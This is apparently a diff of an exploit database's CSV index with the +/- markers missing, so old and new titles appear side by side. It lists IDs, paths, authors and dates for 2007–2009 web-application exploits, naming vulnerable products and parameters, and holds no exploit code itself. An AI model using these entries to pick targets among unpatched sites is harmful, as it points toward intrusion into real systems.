3285,platforms/php/webapps/3285.htm,"Site-Assistant 0990 - (paths[version]) Remote File Inclusion",2007-02-08,ajann,php,webapps,0
3286,platforms/php/webapps/3286.asp,"LightRO CMS 1.0 - (index.php projectid) SQL Injection",2007-02-08,ajann,php,webapps,0
3287,platforms/php/webapps/3287.asp,"LushiNews 1.01 - 'comments.php' SQL Injection",2007-02-08,ajann,php,webapps,0
@ -17444,7 +17448,7 @@ id,file,description,date,author,platform,type,port
3663,platforms/php/webapps/3663.htm,"XOOPS Module WF-Snippets 1.02 (c) - Blind SQL Injection",2007-04-04,ajann,php,webapps,0
3665,platforms/php/webapps/3665.htm,"Mutant 0.9.2 - mutant_functions.php Remote File Inclusion",2007-04-04,bd0rk,php,webapps,0
3666,platforms/php/webapps/3666.pl,"XOOPS Module Rha7 Downloads 1.0 - (visit.php) SQL Injection",2007-04-04,ajann,php,webapps,0
3667,platforms/php/webapps/3667.txt,"Sisplet CMS 05.10 - (site_path) Remote File Inclusion",2007-04-05,kezzap66345,php,webapps,0
3667,platforms/php/webapps/3667.txt,"Sisplet CMS 05.10 - 'site_path' Parameter Remote File Inclusion",2007-04-05,kezzap66345,php,webapps,0
3668,platforms/php/webapps/3668.txt,"CodeWand phpBrowse - (site_path) Remote File Inclusion",2007-04-05,kezzap66345,php,webapps,0
3669,platforms/php/webapps/3669.txt,"PHP-Generics 1.0.0 Beta - Multiple Remote File Inclusion",2007-04-05,bd0rk,php,webapps,0
3670,platforms/php/webapps/3670.txt,"XOOPS Module WF-Links 1.03 - 'cid' SQL Injection",2007-04-05,ajann,php,webapps,0
@ -19075,84 +19079,84 @@ id,file,description,date,author,platform,type,port
5981,platforms/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 - 'hm' Parameter Remote File Inclusion",2008-06-30,"Ghost Hacker",php,webapps,0
5982,platforms/php/webapps/5982.txt,"PHP-Agenda 2.2.4 - 'index.php' Local File Inclusion",2008-07-01,StAkeR,php,webapps,0
5983,platforms/php/webapps/5983.txt,"CAT2 - 'spaw_root' Parameter Local File Inclusion",2008-07-01,StAkeR,php,webapps,0
5984,platforms/php/webapps/5984.txt,"Sisplet CMS - 'index.php id' 2008-01-24 SQL Injection",2008-07-01,"CWH Underground",php,webapps,0
5985,platforms/php/webapps/5985.txt,"VanGogh Web CMS 0.9 - (article_ID) SQL Injection",2008-07-01,"CWH Underground",php,webapps,0
5984,platforms/php/webapps/5984.txt,"Sisplet CMS 2008-01-24 - 'id' Parameter SQL Injection",2008-07-01,"CWH Underground",php,webapps,0
5985,platforms/php/webapps/5985.txt,"VanGogh Web CMS 0.9 - 'article_ID' Parameter SQL Injection",2008-07-01,"CWH Underground",php,webapps,0
5986,platforms/php/webapps/5986.php,"PHP-Nuke Platinium 7.6.b.5 - Remote Code Execution",2008-07-01,"Charles Fol",php,webapps,0
5987,platforms/php/webapps/5987.txt,"Efestech Shop 2.0 - 'cat_id' SQL Injection",2008-07-01,Kacak,php,webapps,0
5988,platforms/php/webapps/5988.txt,"plx Ad Trader 3.2 - (adid) SQL Injection",2008-07-01,"Hussin X",php,webapps,0
5989,platforms/php/webapps/5989.txt,"Joomla! Component versioning 1.0.2 - 'id' SQL Injection",2008-07-01,"DarkMatter Crew",php,webapps,0
5990,platforms/php/webapps/5990.txt,"Joomla! Component mygallery - 'cid' SQL Injection",2008-07-01,Houssamix,php,webapps,0
5991,platforms/php/webapps/5991.txt,"XchangeBoard 1.70 - (boardID) SQL Injection",2008-07-02,haZl0oh,php,webapps,0
5992,platforms/php/webapps/5992.txt,"CMS little 0.0.1 - (index.php template) Local File Inclusion",2008-07-02,"CWH Underground",php,webapps,0
5993,platforms/php/webapps/5993.txt,"Joomla! Component com_brightweblinks - 'catid' SQL Injection",2008-07-02,His0k4,php,webapps,0
5987,platforms/php/webapps/5987.txt,"Efestech Shop 2.0 - 'cat_id' Parameter SQL Injection",2008-07-01,Kacak,php,webapps,0
5988,platforms/php/webapps/5988.txt,"plx Ad Trader 3.2 - 'adid' Parameter SQL Injection",2008-07-01,"Hussin X",php,webapps,0
5989,platforms/php/webapps/5989.txt,"Joomla! Component versioning 1.0.2 - 'id' Parameter SQL Injection",2008-07-01,"DarkMatter Crew",php,webapps,0
5990,platforms/php/webapps/5990.txt,"Joomla! Component mygallery - 'cid' Parameter SQL Injection",2008-07-01,Houssamix,php,webapps,0
5991,platforms/php/webapps/5991.txt,"XchangeBoard 1.70 - 'boardID' Parameter SQL Injection",2008-07-02,haZl0oh,php,webapps,0
5992,platforms/php/webapps/5992.txt,"CMS little 0.0.1 - 'template' Parameter Local File Inclusion",2008-07-02,"CWH Underground",php,webapps,0
5993,platforms/php/webapps/5993.txt,"Joomla! Component Brightcode Weblinks - 'catid' Parameter SQL Injection",2008-07-02,His0k4,php,webapps,0
5994,platforms/php/webapps/5994.pl,"Joomla! Component QuickTime VR 0.1 - SQL Injection",2008-07-02,Houssamix,php,webapps,0
5995,platforms/php/webapps/5995.pl,"Joomla! Component is 1.0.1 - Multiple SQL Injections",2008-07-02,Houssamix,php,webapps,0
5996,platforms/php/webapps/5996.txt,"phPortal 1.2 - Multiple Remote File Inclusions",2008-07-02,Ciph3r,php,webapps,0
5996,platforms/php/webapps/5996.txt,"PHPortal 1.2 - Multiple Remote File Inclusions",2008-07-02,Ciph3r,php,webapps,0
5997,platforms/php/webapps/5997.pl,"CMS WebBlizzard - 'index.php' Blind SQL Injection",2008-07-03,Bl@ckbe@rD,php,webapps,0
5998,platforms/php/webapps/5998.txt,"phpWebNews 0.2 MySQL Edition - (id_kat) SQL Injection",2008-07-03,storm,php,webapps,0
5999,platforms/php/webapps/5999.txt,"phpWebNews 0.2 MySQL Edition - (det) SQL Injection",2008-07-03,"Virangar Security",php,webapps,0
6000,platforms/php/webapps/6000.txt,"pHNews CMS - Multiple Local File Inclusion",2008-07-03,CraCkEr,php,webapps,0
5998,platforms/php/webapps/5998.txt,"PHPwebnews 0.2 MySQL Edition - 'id_kat' Parameter SQL Injection",2008-07-03,storm,php,webapps,0
5999,platforms/php/webapps/5999.txt,"PHPwebnews 0.2 MySQL Edition - 'det' Parameter SQL Injection",2008-07-03,"Virangar Security",php,webapps,0
6000,platforms/php/webapps/6000.txt,"pHNews CMS Alpha 1 - Local File Inclusion",2008-07-03,CraCkEr,php,webapps,0
6001,platforms/php/webapps/6001.txt,"1024 CMS 1.4.4 - Multiple Remote / Local File Inclusion",2008-07-04,DSecRG,php,webapps,0
6002,platforms/php/webapps/6002.pl,"Joomla! Component altas 1.0 - Multiple SQL Injections",2008-07-04,Houssamix,php,webapps,0
6003,platforms/php/webapps/6003.txt,"Joomla! Component DBQuery 1.4.1.1 - Remote File Inclusion",2008-07-04,SsEs,php,webapps,0
6005,platforms/php/webapps/6005.php,"Site@School 2.4.10 - 'FCKeditor' Session Hijacking / Arbitrary File Upload",2008-07-04,EgiX,php,webapps,0
6006,platforms/php/webapps/6006.php,"Thelia 1.3.5 - Multiple Vulnerabilities",2008-07-05,BlackH,php,webapps,0
6007,platforms/php/webapps/6007.txt,"Kasseler CMS 1.3.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-07-05,Cr@zy_King,php,webapps,0
6007,platforms/php/webapps/6007.txt,"Kasseler CMS 1.3.0 - Local File Inclusion / Cross-Site Scripting",2008-07-05,Cr@zy_King,php,webapps,0
6008,platforms/php/webapps/6008.php,"ImperialBB 2.3.5 - Arbitrary File Upload",2008-07-05,PHPLizardo,php,webapps,0
6009,platforms/php/webapps/6009.pl,"Fuzzylime CMS 3.01 - Remote Command Execution",2008-07-05,Ams,php,webapps,0
6010,platforms/php/webapps/6010.txt,"XPOZE Pro 3.06 - 'uid' SQL Injection",2008-07-06,"HIva Team",php,webapps,0
6011,platforms/php/webapps/6011.txt,"ContentNow 1.4.1 - (Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-07-06,"CWH Underground",php,webapps,0
6014,platforms/php/webapps/6014.txt,"SmartPPC Pay Per Click Script - '&idDirectory=' Blind SQL Injection (1)",2008-07-07,Hamtaro,php,webapps,0
6010,platforms/php/webapps/6010.txt,"XPOZE Pro 3.06 - 'uid' Parameter SQL Injection",2008-07-06,"HIva Team",php,webapps,0
6011,platforms/php/webapps/6011.txt,"ContentNow 1.4.1 - Arbitrary File Upload / Cross-Site Scripting",2008-07-06,"CWH Underground",php,webapps,0
6014,platforms/php/webapps/6014.txt,"SmartPPC Pay Per Click Script - 'idDirectory' Blind SQL Injection (1)",2008-07-07,Hamtaro,php,webapps,0
6015,platforms/php/webapps/6015.txt,"WebXell Editor 0.1.3 - Arbitrary File Upload",2008-07-07,"CWH Underground",php,webapps,0
6016,platforms/php/webapps/6016.pl,"Fuzzylime CMS 3.01a - (file) Local File Inclusion",2008-07-07,Cod3rZ,php,webapps,0
6017,platforms/php/webapps/6017.pl,"Triton CMS Pro - (x-forwarded-for) Blind SQL Injection",2008-07-07,girex,php,webapps,0
6018,platforms/php/webapps/6018.pl,"Neutrino 0.8.4 Atomic Edition - Remote Code Execution",2008-07-07,Ams,php,webapps,0
6019,platforms/php/webapps/6019.pl,"SmartPPC Pay Per Click Script - '&idDirectory=' Blind SQL Injection (2)",2008-07-07,ka0x,php,webapps,0
6016,platforms/php/webapps/6016.pl,"Fuzzylime CMS 3.01a - 'file' Parameter Local File Inclusion",2008-07-07,Cod3rZ,php,webapps,0
6017,platforms/php/webapps/6017.pl,"Triton CMS Pro 1.06 - 'x-forwarded-for' Blind SQL Injection",2008-07-07,girex,php,webapps,0
6018,platforms/php/webapps/6018.pl,"QNX Neutrino 0.8.4 Atomic Edition - Remote Code Execution",2008-07-07,Ams,php,webapps,0
6019,platforms/php/webapps/6019.pl,"SmartPPC Pay Per Click Script - 'idDirectory' Blind SQL Injection (2)",2008-07-07,ka0x,php,webapps,0
6021,platforms/php/webapps/6021.txt,"Mole Group Hotel Script 1.0 - SQL Injection",2008-07-08,t0pP8uZz,php,webapps,0
6022,platforms/php/webapps/6022.txt,"Mole Group Real Estate Script 1.1 - SQL Injection",2008-07-08,t0pP8uZz,php,webapps,0
6023,platforms/php/webapps/6023.pl,"BrewBlogger 2.1.0.1 - Arbitrary Add Admin",2008-07-08,"CWH Underground",php,webapps,0
6024,platforms/php/webapps/6024.txt,"Boonex Dolphin 6.1.2 - Multiple Remote File Inclusion",2008-07-08,RoMaNcYxHaCkEr,php,webapps,0
6025,platforms/php/webapps/6025.txt,"Joomla! Component com_content 1.0.0 - 'itemID' SQL Injection",2008-07-08,unknown_styler,php,webapps,0
6025,platforms/php/webapps/6025.txt,"Joomla! Component Content 1.0.0 - 'itemID' Parameter SQL Injection",2008-07-08,unknown_styler,php,webapps,0
6027,platforms/php/webapps/6027.txt,"Mole Group Last Minute Script 4.0 - SQL Injection",2008-07-08,t0pP8uZz,php,webapps,0
6028,platforms/php/webapps/6028.txt,"BoonEx Ray 3.5 - (sIncPath) Remote File Inclusion",2008-07-08,RoMaNcYxHaCkEr,php,webapps,0
6028,platforms/php/webapps/6028.txt,"BoonEx Ray 3.5 - 'sIncPath' Parameter Remote File Inclusion",2008-07-08,RoMaNcYxHaCkEr,php,webapps,0
6033,platforms/php/webapps/6033.pl,"AuraCMS 2.2.2 - 'pages_data.php' Arbitrary Edit/Add/Delete Exploit",2008-07-09,k1tk4t,php,webapps,0
6034,platforms/php/webapps/6034.txt,"DreamPics Builder - (page) SQL Injection",2008-07-09,"Hussin X",php,webapps,0
6035,platforms/php/webapps/6035.txt,"DreamNews Manager - 'id' SQL Injection",2008-07-10,"Hussin X",php,webapps,0
6036,platforms/php/webapps/6036.txt,"gapicms 9.0.2 - (dirDepth) Remote File Inclusion",2008-07-10,"Ghost Hacker",php,webapps,0
6037,platforms/php/webapps/6037.txt,"phpDatingClub - 'website.php' Local File Inclusion",2008-07-10,S.W.A.T.,php,webapps,0
6034,platforms/php/webapps/6034.txt,"DreamPics Builder - 'page' Parameter SQL Injection",2008-07-09,"Hussin X",php,webapps,0
6035,platforms/php/webapps/6035.txt,"DreamNews Manager - 'id' Parameter SQL Injection",2008-07-10,"Hussin X",php,webapps,0
6036,platforms/php/webapps/6036.txt,"gapicms 9.0.2 - 'dirDepth' Parameter Remote File Inclusion",2008-07-10,"Ghost Hacker",php,webapps,0
6037,platforms/php/webapps/6037.txt,"phpDatingClub 3.7 - 'website.php' Local File Inclusion",2008-07-10,S.W.A.T.,php,webapps,0
6040,platforms/php/webapps/6040.txt,"File Store PRO 3.2 - Multiple Blind SQL Injection",2008-07-11,"Nu Am Bani",php,webapps,0
6041,platforms/php/webapps/6041.txt,"facebook newsroom CMS 0.5.0 Beta 1 - Remote File Inclusion",2008-07-11,Ciph3r,php,webapps,0
6042,platforms/php/webapps/6042.txt,"Wysi Wiki Wyg 1.0 - Local File Inclusion / Cross-Site Scripting / PHPInfo",2008-10-20,StAkeR,php,webapps,0
6044,platforms/php/webapps/6044.txt,"Million Pixels 3 - (id_cat) SQL Injection",2008-07-11,"Hussin X",php,webapps,0
6044,platforms/php/webapps/6044.txt,"Million Pixels 3 - 'id_cat' Parameter SQL Injection",2008-07-11,"Hussin X",php,webapps,0
6047,platforms/php/webapps/6047.txt,"Maian Cart 1.1 - Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0
6048,platforms/php/webapps/6048.txt,"Maian Events 2.0 - Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0
6049,platforms/php/webapps/6049.txt,"Maian Gallery 2.0 - Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0
6050,platforms/php/webapps/6050.txt,"Maian Greetings 2.1 - Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0
6051,platforms/php/webapps/6051.txt,"Maian Music 1.0 - Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0
6053,platforms/php/webapps/6053.php,"Fuzzylime CMS 3.01 - (polladd.php poll) Remote Code Execution (PHP)",2008-07-12,"Inphex and real",php,webapps,0
6054,platforms/php/webapps/6054.pl,"Fuzzylime CMS 3.01 - (polladd.php poll) Remote Code Execution (Perl)",2008-07-12,"Inphex and real",php,webapps,0
6053,platforms/php/webapps/6053.php,"Fuzzylime CMS 3.01 - 'poll' Parameter Remote Code Execution (PHP)",2008-07-12,"Inphex and real",php,webapps,0
6054,platforms/php/webapps/6054.pl,"Fuzzylime CMS 3.01 - 'poll' Parameter Remote Code Execution (Perl)",2008-07-12,"Inphex and real",php,webapps,0
6055,platforms/php/webapps/6055.pl,"Joomla! Component n-forms 1.01 - Blind SQL Injection",2008-07-12,"The Moorish",php,webapps,0
6056,platforms/php/webapps/6056.txt,"WebCMS Portal Edition - 'id' SQL Injection",2008-07-12,Mr.SQL,php,webapps,0
6057,platforms/php/webapps/6057.txt,"jsite 1.0 oe - (SQL Injection / Local File Inclusion) Multiple Vulnerabilities",2008-07-12,S.W.A.T.,php,webapps,0
6058,platforms/php/webapps/6058.txt,"Avlc Forum - 'vlc_forum.php id' SQL Injection",2008-07-12,"CWH Underground",php,webapps,0
6060,platforms/php/webapps/6060.php,"Fuzzylime CMS 3.01 - (commrss.php) Remote Code Execution",2008-07-13,"Charles Fol",php,webapps,0
6056,platforms/php/webapps/6056.txt,"WebCMS Portal Edition - 'id' Parameter SQL Injection",2008-07-12,Mr.SQL,php,webapps,0
6057,platforms/php/webapps/6057.txt,"jsite 1.0 oe - SQL Injection / Local File Inclusion",2008-07-12,S.W.A.T.,php,webapps,0
6058,platforms/php/webapps/6058.txt,"Avlc Forum - 'vlc_forum.php' SQL Injection",2008-07-12,"CWH Underground",php,webapps,0
6060,platforms/php/webapps/6060.php,"Fuzzylime CMS 3.01 - 'commrss.php' Remote Code Execution",2008-07-13,"Charles Fol",php,webapps,0
6061,platforms/php/webapps/6061.txt,"Maian Guestbook 3.2 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0
6062,platforms/php/webapps/6062.txt,"Maian Links 3.1 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0
6063,platforms/php/webapps/6063.txt,"Maian Recipe 1.2 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0
6064,platforms/php/webapps/6064.txt,"Maian Weblog 4.0 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0
6065,platforms/php/webapps/6065.txt,"Maian Uploader 4.0 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0
6066,platforms/php/webapps/6066.txt,"Maian Search 1.1 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0
6067,platforms/php/webapps/6067.pl,"Ultrastats 0.2.142 - (players-detail.php) Blind SQL Injection",2008-07-13,DNX,php,webapps,0
6067,platforms/php/webapps/6067.pl,"Ultrastats 0.2.142 - 'players-detail.php' Blind SQL Injection",2008-07-13,DNX,php,webapps,0
6068,platforms/php/webapps/6068.txt,"MFORUM 0.1a - Arbitrary Add Admin",2008-07-13,"CWH Underground",php,webapps,0
6069,platforms/php/webapps/6069.txt,"ITechBids 7.0 gold - Cross-Site Scripting / SQL Injection",2008-07-13,Encrypt3d.M!nd,php,webapps,0
6070,platforms/php/webapps/6070.php,"Scripteen Free Image Hosting Script 1.2 - 'cookie' Pass Grabber Exploit",2008-07-13,RMx,php,webapps,0
6071,platforms/php/webapps/6071.txt,"CodeDB - 'list.php lang' Local File Inclusion",2008-07-14,cOndemned,php,webapps,0
6071,platforms/php/webapps/6071.txt,"CodeDB 1.1.1 - 'list.php' Local File Inclusion",2008-07-14,cOndemned,php,webapps,0
6073,platforms/php/webapps/6073.txt,"bilboblog 2.1 - Multiple Vulnerabilities",2008-07-14,BlackH,php,webapps,0
6074,platforms/php/webapps/6074.txt,"Pluck 4.5.1 - (blogpost) Local File Inclusion (win only)",2008-07-14,BugReport.IR,php,webapps,0
6074,platforms/php/webapps/6074.txt,"Pluck CMS 4.5.1 - 'blogpost' Parameter Local File Inclusion (win only)",2008-07-14,BugReport.IR,php,webapps,0
6075,platforms/php/webapps/6075.txt,"Galatolo Web Manager 1.3a - Cross-Site Scripting / SQL Injection",2008-07-15,StAkeR,php,webapps,0
6076,platforms/php/webapps/6076.txt,"pSys 0.7.0 Alpha - Multiple Remote File Inclusion",2008-07-15,RoMaNcYxHaCkEr,php,webapps,0
6078,platforms/php/webapps/6078.txt,"Pragyan CMS 2.6.2 - (sourceFolder) Remote File Inclusion",2008-07-15,N3TR00T3R,php,webapps,0
6079,platforms/php/webapps/6079.txt,"Comdev Web Blogger 4.1.3 - (arcmonth) SQL Injection",2008-07-15,K-159,php,webapps,0
6078,platforms/php/webapps/6078.txt,"Pragyan CMS 2.6.2 - 'sourceFolder' Parameter Remote File Inclusion",2008-07-15,N3TR00T3R,php,webapps,0
6079,platforms/php/webapps/6079.txt,"Comdev Web Blogger 4.1.3 - 'arcmonth' Parameter SQL Injection",2008-07-15,K-159,php,webapps,0
6080,platforms/php/webapps/6080.txt,"PHP Help Agent 1.1 - (content) Local File Inclusion",2008-07-15,BeyazKurt,php,webapps,0
6081,platforms/php/webapps/6081.txt,"Galatolo Web Manager 1.3a - Insecure Cookie Handling",2008-07-15,"Virangar Security",php,webapps,0
6082,platforms/php/webapps/6082.txt,"PhotoPost vBGallery 2.4.2 - Arbitrary File Upload",2008-07-15,"Cold Zero",php,webapps,0
@ -19191,7 +19195,7 @@ id,file,description,date,author,platform,type,port
6133,platforms/php/webapps/6133.txt,"FizzMedia 1.51.2 - (comment.php mid) SQL Injection",2008-07-25,Mr.SQL,php,webapps,0
6134,platforms/php/webapps/6134.txt,"PHPTest 0.6.3 - (picture.php image_id) SQL Injection",2008-07-25,cOndemned,php,webapps,0
6135,platforms/asp/webapps/6135.txt,"FipsCMS Light 2.1 - 'r' Parameter SQL Injection",2008-07-26,U238,asp,webapps,0
6136,platforms/php/webapps/6136.txt,"phpWebNews 0.2 MySQL Edition - (SQL) Insecure Cookie Handling",2008-07-26,"Virangar Security",php,webapps,0
6136,platforms/php/webapps/6136.txt,"PHPwebnews 0.2 MySQL Edition - (SQL) Insecure Cookie Handling",2008-07-26,"Virangar Security",php,webapps,0
6137,platforms/php/webapps/6137.txt,"IceBB 1.0-RC9.2 - Blind SQL Injection / Session Hijacking Exploit",2008-07-26,girex,php,webapps,0
6138,platforms/php/webapps/6138.txt,"Mobius 1.4.4.1 - (browse.php id) SQL Injection",2008-07-26,dun,php,webapps,0
6139,platforms/php/webapps/6139.txt,"EPShop < 3.0 - 'pid' SQL Injection",2008-07-26,mikeX,php,webapps,0
@ -19341,7 +19345,7 @@ id,file,description,date,author,platform,type,port
6364,platforms/php/webapps/6364.txt,"ACG-ScriptShop - 'cid' SQL Injection",2008-09-04,"Hussin X",php,webapps,0
6368,platforms/php/webapps/6368.php,"AWStats Totals - 'AWStatstotals.php sort' Remote Code Execution",2008-09-05,"Ricardo Almeida",php,webapps,0
6369,platforms/php/webapps/6369.py,"Devalcms 1.4a - Cross-Site Scripting / Remote Code Execution",2008-09-05,"Khashayar Fereidani",php,webapps,0
6370,platforms/php/webapps/6370.pl,"WebCMS Portal Edition - 'index.php id' Blind SQL Injection",2008-09-05,JosS,php,webapps,0
6370,platforms/php/webapps/6370.pl,"WebCMS Portal Edition - 'id' Parameter Blind SQL Injection",2008-09-05,JosS,php,webapps,0
6371,platforms/php/webapps/6371.txt,"Vastal I-Tech Agent Zone - (ann_id) SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0
6373,platforms/php/webapps/6373.txt,"Vastal I-Tech Visa Zone - (news_id) SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0
6374,platforms/php/webapps/6374.txt,"Vastal I-Tech Toner Cart - 'id' SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0
@ -19432,7 +19436,7 @@ id,file,description,date,author,platform,type,port
6488,platforms/php/webapps/6488.txt,"Diesel Joke Site - 'picture_category.php id' SQL Injection",2008-09-18,SarBoT511,php,webapps,0
6489,platforms/php/webapps/6489.txt,"ProActive CMS - 'template' Local File Inclusion",2008-09-18,r45c4l,php,webapps,0
6490,platforms/php/webapps/6490.txt,"AssetMan 2.5-b - SQL Injection using Session Fixation Attack",2008-09-18,"Neo Anderson",php,webapps,0
6492,platforms/php/webapps/6492.php,"Pluck 4.5.3 - (update.php) Remote File Corruption Exploit",2008-09-19,Nine:Situations:Group,php,webapps,0
6492,platforms/php/webapps/6492.php,"Pluck CMS 4.5.3 - 'update.php' Remote File Corruption Exploit",2008-09-19,Nine:Situations:Group,php,webapps,0
6494,platforms/php/webapps/6494.txt,"easyLink 1.1.0 - 'detail.php' SQL Injection",2008-09-19,"Egypt Coder",php,webapps,0
6495,platforms/php/webapps/6495.txt,"Explay CMS 2.1 - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2008-09-19,hodik,php,webapps,0
6499,platforms/php/webapps/6499.txt,"Advanced Electron Forum 1.0.6 - Remote Code Execution",2008-09-20,"GulfTech Security",php,webapps,0
@ -19953,10 +19957,10 @@ id,file,description,date,author,platform,type,port
7144,platforms/php/webapps/7144.txt,"Jadu Galaxies - 'categoryId' Blind SQL Injection",2008-11-17,ZoRLu,php,webapps,0
7146,platforms/php/webapps/7146.txt,"Simple Customer 1.2 - (Authentication Bypass) SQL Injection",2008-11-17,d3b4g,php,webapps,0
7147,platforms/php/webapps/7147.txt,"SaturnCMS - (view) Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0
7148,platforms/php/webapps/7148.txt,"Ultrastats 0.2.144/0.3.11 - (index.php serverid) SQL Injection",2008-11-17,eek,php,webapps,0
7148,platforms/php/webapps/7148.txt,"Ultrastats 0.2.144/0.3.11 - 'serverid' Parameter SQL Injection",2008-11-17,eek,php,webapps,0
7149,platforms/php/webapps/7149.php,"VideoScript 4.0.1.50 - Admin Change Password Exploit",2008-11-17,G4N0K,php,webapps,0
7152,platforms/php/webapps/7152.txt,"MusicBox 2.3.8 - 'viewalbums.php' SQL Injection",2008-11-18,snakespc,php,webapps,0
7153,platforms/php/webapps/7153.txt,"Pluck CMS 4.5.3 - (g_pcltar_lib_dir) Local File Inclusion",2008-11-18,DSecRG,php,webapps,0
7153,platforms/php/webapps/7153.txt,"Pluck CMS 4.5.3 - 'g_pcltar_lib_dir' Parameter Local File Inclusion",2008-11-18,DSecRG,php,webapps,0
7155,platforms/php/webapps/7155.txt,"Free Directory Script 1.1.1 - (API_HOME_DIR) Remote File Inclusion",2008-11-18,"Ghost Hacker",php,webapps,0
7156,platforms/php/webapps/7156.txt,"E-topbiz Link Back Checker 1 - Insecure Cookie Handling",2008-11-18,x0r,php,webapps,0
7157,platforms/php/webapps/7157.txt,"Alex News-Engine 1.5.1 - Arbitrary File Upload",2008-11-19,Batter,php,webapps,0
@ -20013,7 +20017,7 @@ id,file,description,date,author,platform,type,port
7228,platforms/php/webapps/7228.txt,"Clean CMS 1.5 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-25,ZoRLu,php,webapps,0
7229,platforms/php/webapps/7229.txt,"FAQ Manager 1.2 - (config_path) Remote File Inclusion",2008-11-25,ZoRLu,php,webapps,0
7230,platforms/php/webapps/7230.pl,"Clean CMS 1.5 - (full_txt.php id) Blind SQL Injection",2008-11-25,JosS,php,webapps,0
7231,platforms/php/webapps/7231.txt,"Fuzzylime CMS 3.03 - (track.php p) Local File Inclusion",2008-11-25,"Alfons Luja",php,webapps,0
7231,platforms/php/webapps/7231.txt,"Fuzzylime CMS 3.03 - 'track.php' Local File Inclusion",2008-11-25,"Alfons Luja",php,webapps,0
7232,platforms/php/webapps/7232.txt,"SimpleBlog 3.0 - (simpleBlog.mdb) Database Disclosure",2008-11-25,EL_MuHaMMeD,php,webapps,0
7233,platforms/php/webapps/7233.txt,"LoveCMS 1.6.2 Final (Download Manager 1.0) - Arbitrary File Upload",2008-11-25,cOndemned,php,webapps,0
7234,platforms/php/webapps/7234.txt,"VideoGirls BiZ - 'view_snaps.php type' Blind SQL Injection",2008-11-25,Cyber-Zone,php,webapps,0
@ -20047,7 +20051,7 @@ id,file,description,date,author,platform,type,port
7266,platforms/php/webapps/7266.pl,"All Club CMS 0.0.2 - Remote Database Config Retrieve Exploit",2008-11-28,StAkeR,php,webapps,0
7267,platforms/php/webapps/7267.txt,"SailPlanner 0.3a - (Authentication Bypass) SQL Injection",2008-11-28,JIKO,php,webapps,0
7268,platforms/php/webapps/7268.txt,"Bluo CMS 1.2 - (index.php id) Blind SQL Injection",2008-11-28,The_5p3ctrum,php,webapps,0
7269,platforms/php/webapps/7269.pl,"CMS little 0.0.1 - (index.php term) SQL Injection",2008-11-28,"CWH Underground",php,webapps,0
7269,platforms/php/webapps/7269.pl,"CMS little 0.0.1 - 'term' Parameter SQL Injection",2008-11-28,"CWH Underground",php,webapps,0
7270,platforms/php/webapps/7270.txt,"ReVou Twitter Clone - (Authentication Bypass) SQL Injection",2008-11-28,R3d-D3V!L,php,webapps,0
7271,platforms/php/webapps/7271.txt,"Ocean12 FAQ Manager Pro (ID) - Blind SQL Injection",2008-11-28,Stack,php,webapps,0
7273,platforms/asp/webapps/7273.txt,"Active Force Matrix 2 - (Authentication Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0
@ -20490,7 +20494,7 @@ id,file,description,date,author,platform,type,port
7867,platforms/php/webapps/7867.php,"ITLPoll 2.7 Stable2 - (index.php id) Blind SQL Injection",2009-01-26,fuzion,php,webapps,0
7872,platforms/asp/webapps/7872.txt,"E-ShopSystem - Authentication Bypass / SQL Injection",2009-01-26,InjEctOr5,asp,webapps,0
7873,platforms/php/webapps/7873.txt,"Script Toko Online 5.01 - (shop_display_products.php) SQL Injection",2009-01-26,k1n9k0ng,php,webapps,0
7874,platforms/php/webapps/7874.txt,"SHOP-INET 4 - 'show_cat2.php grid' SQL Injection",2009-01-26,FeDeReR,php,webapps,0
7874,platforms/php/webapps/7874.txt,"SHOP-INET 4 - 'grid' Parameter SQL Injection",2009-01-26,FeDeReR,php,webapps,0
7876,platforms/php/webapps/7876.php,"PHP-CMS 1 - 'Username' Blind SQL Injection",2009-01-26,darkjoker,php,webapps,0
7877,platforms/php/webapps/7877.txt,"Wazzum Dating Software - (userid) SQL Injection",2009-01-26,nuclear,php,webapps,0
7878,platforms/php/webapps/7878.txt,"Groone's GLink ORGanizer - 'index.php cat' SQL Injection",2009-01-26,nuclear,php,webapps,0
@ -20715,7 +20719,7 @@ id,file,description,date,author,platform,type,port
8255,platforms/php/webapps/8255.txt,"Supernews 1.5 - (valor.php noticia) SQL Injection",2009-03-23,p3s0k!,php,webapps,0
8258,platforms/php/webapps/8258.pl,"X-BLC 0.2.0 - (get_read.php section) SQL Injection",2009-03-23,dun,php,webapps,0
8268,platforms/php/webapps/8268.php,"PHPizabi 0.848b C1 HFP1-3 - Remote Command Execution",2009-03-23,YOUCODE,php,webapps,0
8271,platforms/php/webapps/8271.php,"Pluck CMS 4.6.1 - (module_pages_site.php post) Local File Inclusion",2009-03-23,"Alfons Luja",php,webapps,0
8271,platforms/php/webapps/8271.php,"Pluck CMS 4.6.1 - 'module_pages_site.php' Local File Inclusion",2009-03-23,"Alfons Luja",php,webapps,0
8272,platforms/php/webapps/8272.pl,"Codice CMS 2 - SQL Command Execution",2009-03-23,darkjoker,php,webapps,0
8276,platforms/php/webapps/8276.pl,"Syzygy CMS 0.3 - Local File Inclusion / SQL Command Injection",2009-03-23,Osirys,php,webapps,0
8277,platforms/php/webapps/8277.txt,"Free Arcade Script 1.0 - Authentication Bypass (SQL Injection) / Arbitrary File Upload",2009-03-23,Mr.Skonnie,php,webapps,0
@ -20764,7 +20768,7 @@ id,file,description,date,author,platform,type,port
